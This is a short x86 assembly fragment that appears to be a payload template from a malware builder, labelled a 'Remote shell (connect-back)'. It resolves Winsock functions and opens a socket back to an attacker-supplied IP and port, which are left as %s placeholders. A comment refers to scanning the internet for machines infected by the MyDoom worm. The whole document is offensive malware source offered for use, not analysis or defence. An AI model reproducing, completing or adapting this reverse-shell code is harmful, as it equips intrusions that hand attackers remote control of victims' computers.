;%%%5 2 CBSH Remote shell (connect-back)

;###LoadLibraryA
;###CreateThread
;###CreateProcessA
;###GetEnvironmentVariableA
;###Sleep

;open remote shell (NT4+ only)

payload:
	pushad

;setup stuff

	call @@apiimport
	API WSAStartup
	API WSASocketA
	API connect
	dd -1
  @@apiimport:
  	pop esi

;$$$SETT


;scan internet in search for machines infected by mydoom

shell_thread:
	xor esi, esi
	push esi
	push esi
	push esi
	push esi
	push 1
	push 2
	call delta
	call [ebp+_WSASocketA]
	mov ebx,eax

	push esi
	push esi
	push 12345678h
      org $-4
      	db %s
      	mov eax, %s
      	xchg al,ah
      	shl eax,16
      	mov ax,2
      	push eax
      	mov eax,esp

      	push 16
      	push eax
      	push ebx
	call [ebp+_connect]
	add esp,4*4

;$$$CPRO

	push -1
	call [ebp+_Sleep]
